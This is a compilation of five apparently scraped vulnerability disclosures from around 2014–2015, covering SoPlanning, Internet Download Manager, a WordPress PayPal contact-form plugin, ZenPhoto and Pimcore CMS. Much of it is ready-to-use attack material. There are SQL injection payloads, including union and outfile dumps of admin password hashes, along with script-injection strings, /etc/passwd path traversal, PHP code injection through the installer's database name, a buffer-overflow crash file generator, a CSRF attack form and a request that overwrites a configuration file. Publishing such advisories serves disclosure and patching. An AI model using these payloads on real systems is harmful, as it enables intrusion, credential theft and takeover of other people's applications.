SO Planning is an open source online planning tool completely free, designed to easily plan projects / tasks online, in order to manage and define work for a whole team. (from http://www.soplanning.org/en/index.php)

Advisory introduction:
Soplanning version 1.32 is susceptible to multiple vulnerabilities, including SQLi, XSS, path traversal, authentication information disclosure, PHP code injection.

Credit: Huy-Ngoc DAU of Deloitte Conseil, France

================================
Finding 1: Soplanning multiple SQL injection vulnerabilities (CVE-2014-8673)
================================
- SQLi in planning.php
The project, user, task filters are prone to SQLi due to lack of user input sanitization.

POC :
POST /process/planning.php HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 141
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/planning.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4,vi;q=0.2
Cookie: soplanning=[VALID SESSION COOKIE]; inverserUsersProjets=1

filtreGroupeProjet=1&projet_anything=anything') union all select 111,table_name,333,444,555,666,777,888,999 from information_schema.tables#

The query's results can be retrieved by accessing http://localhost/export_csv.php


- order by statement blind SQLi in user_list.php, projets.php, user_groupes.php, groupe_list.php
POC:
http://localhost/user_list.php?page=1&order=1,1&by=
http://localhost/projets.php?order=1,0&by=
http://localhost/user_groupes.php?page=1&order=1,(select%20case%20when%20(1=1)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=
http://localhost/groupe_list.php?page=1&order=1,(select%20case%20when%20(1=0)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=


- triPlanning GET parameter Blind SQLi in process/planning.php
POC:
http://localhost/process/planning.php?triPlanning=1,1
and
http://localhost/process/planning.php?triPlanning=1,0
(don't follow redirection back to ../planning.php where the sanitization is done)

The differences of TRUE and FALSE can be observed by accessing http://localhost/export_pdf.php?debug=1


- SQLi in LIMIT statement in nb_lignes cookie
POC: set the following cookie :
nb_lignes=20 into outfile '/tmp/poc_soplanning.txt'
and visit http://localhost/process/planning.php

Sample file output content:
ADM      \N          admin    admin    df5b909019c9b1659e86e0d6bf8da81d6fa3499e   \N          oui               000000  ["users_manage_all", "projects_manage_all", "projectgroups_manage_all", "tasks_modify_all", "tasks_view_all_projects", "parameters_all"]  [md5]    non        \N


- insecure use of addslashes function to protect against SQLi
Soplanning sanitizes user input to protect against SQLi by using PHP addslashes() function. However, this function is known to be unsafe. Instead, mysql_real_escape_string() should be used.

================================
Finding 2: Soplanning multiple XSS vulnerabilities (CVE-2014-8674)
================================
- XSS via cookie manipulation in unauthenticated mode (nb_mois, nb_lignes)
This vulnerable allows for an attacker having physical access to a user's browser even in unauthenticated mode to steal the user's authenticated cookie.

POC:
Disconnect active user session
At authentication page, set the following cookie: nb_mois="><script>alert(document.cookie)</script><"
Login with any valid user account, an alert message will show the cookies.


- Stored XSS in calender export functions
Export functions offer a "debug" mode which outputs HTML instead of formatted content (pdf, ical). This mode can be activated by setting the "debug" GET parameter. However, by injecting malicious HTML code into a project name for example, it is possible to conduct XSS attacks.

POC:
Create a new project with the name <script>alert(1);</script>
Access http://localhost/export_pdf.php?debug=1

================================
Finding 3: Soplanning authentication hash disclosure via GET URL in ICAL calender sharing function (CVE-2014-8675)
================================
Soplanning allows for an ICAL calendar to be shared/used elsewhere. However, the link is generated statically using authentication information.

Sample generated link:
http://localhost/export_ical.php?login=admin&hash=61b9bab17cdab06e759f2d11ee11afab

An offline brute force attack can thus be conducted to find the user's password: hash = md5($user->login . '¤¤' . $user->password);

================================
Finding 4: Soplanning path traversal in Holidays calender import function (CVE-2014-8676)
================================
If error messages are activated, the vulnerability allows to detect existence of a remote arbitrary file.

POC:
http://localhost/process/feries.php?fichier=../../../../../../../etc/passwd

Sample error output when file does not exist:
Warning: file_get_contents(../../holidays/../../etc/passwd) [function.file-get-contents]: failed to open stream: No such file or directory in /[PATH]/includes/class_vcalendar.inc on line 1665

However, it is not possible to retrieve file content or conduct further attack using this vulnerability.

================================
Finding 5: Soplanning PHP code injection in installation process (CVE-2014-8677)
================================
The installation process is prone to PHP code execution vulnerability.

POC:
 - Go to http://localhost/install
- Enter valid database credentials and host information. The database name is as follows :
 so';phpinfo();//
- The next page will show the phpinfo() results

It should be noted that in order for the attack to work, the attacker must prepare his own database server and the database user must either have access to a real database named "so';phpinfo();//", or have privileges to create any database.

For installed instances of Soplanning, the attack is also possible (i.e. the installing interface is accessible) if:
- PHP version is older than 5.2
- Configured database server is (temporarily or not) down
- The directory smarty/templates_c is not writable


================================

Timeline:
03/08/2014 - Vulnerability discovered
11/08/2014 - Vendor notified
14/08/2014 - Vendor confirmed
09/09/2014 - Patch released

References:
Soplanning changelog : http://www.soplanning.org/en/download.php


About Deloitte:
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.

Huy-Ngoc DAU
Senior Consultant | IT Advisory
Deloitte Conseil
185, avenue Charles de Gaulle, Neuilly-sur-Seine, 92200, France
Mobile: +33 (0)6 70 97 91 95  Tel: +33 (0)1 58 37 03 72
hdau@deloitte.fr<mailto:hdau@deloitte.fr> | www.deloitte.fr<www.deloitte.com>

Avant d'imprimer, pensez à l'environnement
HireHackking 
#!/usr/bin/env python
# Title : Internet Download Manager - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 / Server 2008
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open "IDM"
# 3 . Tasks --> Import --> From IDM export file
# 4 . select r3z4.ief
# 5 . Crashed ;)


hdr = "<" #start syntax
hcr = "ftp://" #pro
crash = "\x41"*1992999 #B0F
exp = hdr+hcr+crash+hdr+hcr+crash
file = open("r3z4.ief", "w")
file.write(exp)
file.close()
HireHackking 
# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection
in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79], Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection')[CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff:
https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog:
https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
# CVE Status: None/Unassigned/Fresh

## Product Information:

With CP Contact Form with Paypal you can insert a contact form into a
WordPress website and connect it to a PayPal payment.

## Vulnerability Description:

The forms in the admin area of the plugin allows CSRF. This gives the
capacity for the attacker to add new forms, modify existing form settings,
launch XSS attacks, export CSV files of the messages, delete forms, and
perform SQL Injection.

## Proof of Concept:

<h3>CSRF - Action Links</h3>
<ul>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export
to CSV</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098">
Clone form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete
form/item</a></li>
</ul>


<h3>CSRF, XSS, SQLi - Settings form</h3>
<form action="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042"
method="post">
<input type="hidden" name="cp_contactformpp_post_options" value='' />

<!--
if cp_contactformpp_id is injected with XSS, the other script vectors won't
work
<input type="hidden" name="cp_contactformpp_id"
value='"><script>alert(3);</script>' />

SQL injection possible cp_contactformpp_id
<input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" />
-->

<input type="hidden" name="cp_contactformpp_id" value='11' />
<input type="hidden" name="fp_from_email" value='asd@evilcorp.org' />
<input type="hidden" name="fp_message" value='The following contact message
has been sent:<%INFO%>&lt;/textarea&gt;<script>alert(1);</script>' />
<input type="hidden" name="cu_message" value='Thank you for your message.
We will reply you as soon as possible.This is a copy of the data
sent:<%INFO%>Best Regards.&lt;/textarea&gt;<script>alert(2);</script>' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="submit" value="submit" />
</form>

## Solution:

Upgrade to v1.1.6

## Disclosure Timeline:

2015-05-19 - Discovered. Contacted developer on support forums.
2015-05-20 - Mailed developer initial report
2015-05-25 - Patched v1.1.6 released
2015-07-09 - Publishing disclosure to FD

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
HireHackking 
Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10

SQL Injection
=============

  There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.

   - visit zp-core/admin-options.php?saved&tab=gallery
     alternatively visit zp-core/admin-options.php?saved&tab=image
   - Set "Sort gallery by" to "Custom"
   - set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
   - visit zp-core/admin-upload.php?page=upload&tab=http&type=images
   - alternatively, visiting either of these will also trigger the injection:
    /
    zp-core/admin-edit.php
    zp-core/admin-users.php?page=users
    zp-core/admin-themes.php

  The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs

XSS 1
=====

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

    The payload must first be HTML entity-encoded, and then URL encoded.

XSS 2
=====


http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!

Directory Traversal
===================

  For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php


Execute Function
================

An admin user can execute any function they want via this URL (there is
no CSRF protection for it):

    localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo

This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.

Source
======

http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
HireHackking 
Vulnerability title: Directory Traversal/Configuration Update In Pimcore CMS
CVE: CVE-2015-4425
Vendor: Pimcore
Product: Pimcore CMS
Affected version: Build 3450
Fixed version: Build 3473
Reported by: Josh Foote
Details:

It is possible for an administrative user with the 'assets' permission to overwrite system configuration files via exploiting a directory traversal vulnerability.

The following request can be used to update the ‘system.xml’ file of the web application:

POST /admin/asset/add-asset-compatibility/?parentId=1&dir=../config HTTP/1.1
Host: pimcore.com
Connection: keep-alive
Content-Length: 1502
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: multipart/form-data; boundary=--------2072505619
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=nnmupv1knofcpdgjdnivdr4v27; cookie-warn=true; _ga=GA1.2.1941920115.1426505099; pimcore_admin_sid=j79b6ad4afkjimslbj8l5ifuo4

----------2072505619
Content-Disposition: form-data; name="Filedata"; filename="system.xml" 
Content-Type: application/xml

<?xml version="1.0"?>
<zend-config xmlns:zf="http://framework.zend.com/xml/zend-config-xml/1.0/">
  <general>
    <timezone>Europe/Berlin</timezone>
    <language>en</language>
    <validLanguages>en</validLanguages>
    <debug>1</debug>
    <debugloglevel>debug</debugloglevel>
    <custom_php_logfile>1</custom_php_logfile>
  </general>
  <database>
    <adapter>Mysqli</adapter>
    <params>
      <username>root</username>
      <password>PASSWORD</password>
      <dbname>pimcore</dbname>
      <host>localhost</host>
      <port>3306</port>
    </params>
  </database>
  <documents>
    <versions>
      <steps>10</steps>
    </versions>
    <default_controller>default</default_controller>
    <default_action>default</default_action>
    <error_pages>
      <default>/</default>
    </error_pages>
    <createredirectwhenmoved/>
    <allowtrailingslash>no</allowtrailingslash>
    <allowcapitals>no</allowcapitals>
    <generatepreview>1</generatepreview>
  </documents>
  <objects>
    <versions>
      <steps>10</steps>
    </versions>
  </objects>
  <assets>
    <versions>
      <steps>10</steps>
    </versions>
  </assets>
  <services/>
  <cache>
    <excludeCookie/>
  </cache>
  <httpclient>
    <adapter>Zend_Http_Client_Adapter_Socket</adapter>
  </httpclient>
</zend-config>



Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-4425/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################